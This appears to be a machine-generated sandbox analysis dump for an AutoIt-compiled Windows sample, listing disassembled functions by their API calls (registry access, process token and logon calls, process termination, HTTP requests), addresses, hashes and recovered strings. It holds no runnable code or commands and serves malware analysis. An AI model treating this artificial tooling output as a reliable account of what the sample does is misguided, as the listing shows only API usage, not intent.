                                                                                        • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                                                                                        • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                                                        • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: _memmove$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3253778849-0
                                                                                        • Opcode ID: 7a9d2276f8bc6090ad2ff2e4bc0facee7f220cdfea25bb18be49390af5a0a179
                                                                                        • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                                                                                        • Opcode Fuzzy Hash: 7a9d2276f8bc6090ad2ff2e4bc0facee7f220cdfea25bb18be49390af5a0a179
                                                                                        • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4046560759-0
                                                                                        • Opcode ID: bf692df503075bba793d5cc951f82f829aed1168ab2e61a26274d242b60a892a
                                                                                        • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                                                                                        • Opcode Fuzzy Hash: bf692df503075bba793d5cc951f82f829aed1168ab2e61a26274d242b60a892a
                                                                                        • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
                                                                                        APIs
                                                                                        • GetMenu.USER32(?), ref: 004857FB
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00485832
                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0048585A
                                                                                        • GetMenuItemID.USER32(?,?), ref: 004858C9
                                                                                        • GetSubMenu.USER32(?,?), ref: 004858D7
                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00485928
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                        • String ID:
                                                                                        • API String ID: 650687236-0
                                                                                        • Opcode ID: fad01ffac506ac452b0c02e795c4ae8801d71ba59cba857f2c5d01f3afad97ac
                                                                                        • Instruction ID: f019c79df8c938943ad8434395c060b2cb7e18679ec399e957168710705cd923
                                                                                        • Opcode Fuzzy Hash: fad01ffac506ac452b0c02e795c4ae8801d71ba59cba857f2c5d01f3afad97ac
                                                                                        • Instruction Fuzzy Hash: 72514C75E00615AFCF11EF65C845AAEBBB4EF48314F10446AE801BB352DB78AE418B99
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 0045EF06
                                                                                        • VariantClear.OLEAUT32(00000013), ref: 0045EF78
                                                                                        • VariantClear.OLEAUT32(00000000), ref: 0045EFD3
                                                                                        • _memmove.LIBCMT ref: 0045EFFD
                                                                                        • VariantClear.OLEAUT32(?), ref: 0045F04A
                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
                                                                                        Similarity
                                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1101466143-0
                                                                                        • Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                                                        • Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
                                                                                        • Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                                                        • Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00462258
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
                                                                                        • IsMenu.USER32(00000000), ref: 004622C3
                                                                                        • CreatePopupMenu.USER32 ref: 004622F7
                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00462355
                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3311875123-0
                                                                                        • Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                                                        • Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
                                                                                        • Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                                                        • Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 0040179A
                                                                                        • GetWindowRect.USER32(?,?), ref: 004017FE
                                                                                        • ScreenToClient.USER32(?,?), ref: 0040181B
                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040182C
                                                                                        • EndPaint.USER32(?,?), ref: 00401876
                                                                                        Similarity
                                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                        • String ID:
                                                                                        • API String ID: 1827037458-0
                                                                                        • Opcode ID: d9366b8442643d94811bf82364bc44e8890a7fb11cafe672375ae29e37d5b646
                                                                                        • Instruction ID: 802354e609c34c5ad38a523f12b28351d49e30531d5e0f2791b792dab913329b
                                                                                        • Opcode Fuzzy Hash: d9366b8442643d94811bf82364bc44e8890a7fb11cafe672375ae29e37d5b646
                                                                                        • Instruction Fuzzy Hash: AF418E31100700AFD710EF25C884FAA7BE8EB49724F044A3EFA94962F1C734A945DB6A
                                                                                        APIs
                                                                                        • ShowWindow.USER32(004C57B0,00000000,00CD3038,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B712
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 0048B736
                                                                                        • ShowWindow.USER32(004C57B0,00000000,00CD3038,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B796
                                                                                        • ShowWindow.USER32(00000000,00000004,?,0048B5A8,?,?), ref: 0048B7A8
                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 0048B7CC
                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0048B7EF
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 642888154-0
                                                                                        • Opcode ID: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                                                                                        • Instruction ID: 1d3b34d551e73e97491640bec01ce8c12bc83bc2c135b759935fb039f22faf4f
                                                                                        • Opcode Fuzzy Hash: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                                                                                        • Instruction Fuzzy Hash: 1941A834600340AFDB21DF28C499B9A7BE0FF49310F5845BAF9488F762C735A856CB94
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
                                                                                          • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
                                                                                        • GetDesktopWindow.USER32 ref: 004770D6
                                                                                        • GetWindowRect.USER32(00000000), ref: 004770DD
                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
                                                                                          • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                                                        • GetCursorPos.USER32(?), ref: 0047713B
                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
                                                                                        Similarity
                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4137160315-0
                                                                                        • Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                                                        • Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
                                                                                        • Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                                                        • Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
                                                                                        APIs
                                                                                          • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                                                          • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                                                          • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                                                          • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                                                          • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                                                        • GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004588DD
                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00458911
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                        • String ID:
                                                                                        • API String ID: 3008561057-0
                                                                                        • Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                                                        • Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
                                                                                        • Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                                                        • Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00458603
                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
                                                                                        Similarity
                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                        • String ID:
                                                                                        • API String ID: 1413079979-0
                                                                                        • Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                                                        • Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
                                                                                        • Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                                                        • Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0045B7B5
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0045B7C6
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045B7CD
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0045B7D5
                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0045B7EC
                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0045B7FE
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$Release
                                                                                        • String ID:
                                                                                        • API String ID: 1035833867-0
                                                                                        • Opcode ID: e8a4a266755e065bcf82882bab04b7313908cea5161a3f7747e2bdf77f2db466
                                                                                        • Instruction ID: ebab011a078b8c66a555392ea924b50fda774449f62ca66a232c327e230173f3
                                                                                        • Opcode Fuzzy Hash: e8a4a266755e065bcf82882bab04b7313908cea5161a3f7747e2bdf77f2db466
                                                                                        • Instruction Fuzzy Hash: ED018475E00209BBEF109BE69C49A5EBFB8EB48711F00407AFE04A7291D6309C14CF94
                                                                                        APIs
                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                                        Similarity
                                                                                        • API ID: Virtual
                                                                                        • String ID:
                                                                                        • API String ID: 4278518827-0
                                                                                        • Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                                                        • Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
                                                                                        • Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                                                        • Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                                                                                        Similarity
                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 839392675-0
                                                                                        • Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                                                        • Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
                                                                                        • Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                                                        • Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                                                                                        • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                                                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                                                                                          • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 3495660284-0
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                                                                                        • CloseHandle.KERNEL32(?), ref: 004589B2
                                                                                        • CloseHandle.KERNEL32(?), ref: 004589BA
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                                                                                        • HeapFree.KERNEL32(00000000), ref: 004589CA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                        • String ID:
                                                                                        • API String ID: 146765662-0
                                                                                        APIs
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
                                                                                        • _memcmp.LIBCMT ref: 00457748
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                        • String ID: ,,I
                                                                                        • API String ID: 314563124-4163367948
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00478613
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00478722
                                                                                        • VariantClear.OLEAUT32(?), ref: 0047889A
                                                                                          • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                                                                                          • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                                                                                          • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                        • API String ID: 4237274167-1221869570
                                                                                        APIs
                                                                                          • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                        • _memset.LIBCMT ref: 00462B87
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                        • String ID: 0
                                                                                        • API String ID: 4152858687-4108050209
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _memmove$_free
                                                                                        • String ID: 3cA$_A
                                                                                        • API String ID: 2620147621-3480954128
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _memset$_memmove
                                                                                        • String ID: 3cA$ERCP
                                                                                        • API String ID: 2532777613-1471582817
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 004627C0
                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1173514356-4108050209
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                                                                          • Part of subcall function 0040784B: _memmove.LIBCMT ref: 00407899
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower_memmove
                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                        • API String ID: 3425801089-567219261
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$_memmove$ClassName
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 365058703-1403004172
                                                                                        • Opcode ID: 9694635ecc2fb9deb2e2cc82a813c0850caf6602120938544a81ca6f57e54b8a
                                                                                        • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                                                                                        • Opcode Fuzzy Hash: 9694635ecc2fb9deb2e2cc82a813c0850caf6602120938544a81ca6f57e54b8a
                                                                                        • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                                                                                        APIs
                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00471872
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004718A2
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004718E9
                                                                                          • Part of subcall function 00472483: GetLastError.KERNEL32(?,?,00471817,00000000,00000000,00000001), ref: 00472498
                                                                                          • Part of subcall function 00472483: SetEvent.KERNEL32(?,?,00471817,00000000,00000000,00000001), ref: 004724AD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                        • String ID:
                                                                                        • API String ID: 3113390036-3916222277
                                                                                        • Opcode ID: 6e03d3876d11c1f4078e21f2429e25c28f700f0be32576d9d2588f00842c0ae0
                                                                                        • Instruction ID: 9f195ba99928d8c49214c982579914efbee4b11eb605a7749f470a37591c6317
                                                                                        • Opcode Fuzzy Hash: 6e03d3876d11c1f4078e21f2429e25c28f700f0be32576d9d2588f00842c0ae0
                                                                                        • Instruction Fuzzy Hash: 1021B3B15002087FE711AF65DC85EFF77EDEB48748F10812FF44992250DA688D0957AA
                                                                                        APIs
                                                                                          • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                          • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                          • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00486468
                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                                                                                        • DestroyWindow.USER32(?), ref: 00486485
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                        • String ID: SysAnimate32
                                                                                        • API String ID: 4146253029-1011021900
                                                                                        • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                                        • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                                                                                        • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                                        • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
